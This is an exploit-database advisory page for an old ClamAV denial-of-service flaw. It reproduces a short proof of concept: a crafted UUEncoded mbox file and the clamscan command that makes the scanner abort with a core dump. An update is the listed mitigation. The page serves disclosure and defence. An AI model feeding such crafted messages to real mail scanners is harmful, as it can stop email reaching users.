header-logo
Suggest Exploit
vendor:
ClamAV
by:
Unknown
7.5
CVSS
HIGH
Denial of Service
399
CWE
Product Name: ClamAV
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: YES
Related CWE: CVE-2003-0887
CPE: a:clamav:clamav
Metasploit:
Other Scripts:
Platforms Tested:
2003

ClamAV UUEncoded Message Handling DoS

A problem in the handling of specially crafted UUEncoded messages in ClamAV allows an attacker to prevent the delivery of e-mail to users.

Mitigation:

Update to the latest version of ClamAV.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/9610/info

A problem in the handling of specially crafted UUEncoded messages has been identified in ClamAV. Because of this, an attacker may prevent the delivery of e-mail to users.

Save the following file to ~/clamtest.mbox:

From -

begin 644 byebye
byebye
end

Then do:

# clamscan --mbox -v ~/clamtest.mbox
assertion "(len >= 0) && (len <= 63)" failed: file "message.c", line 887
Abort (core dumped)

Navigation

Suggest Exploit

Services By CQR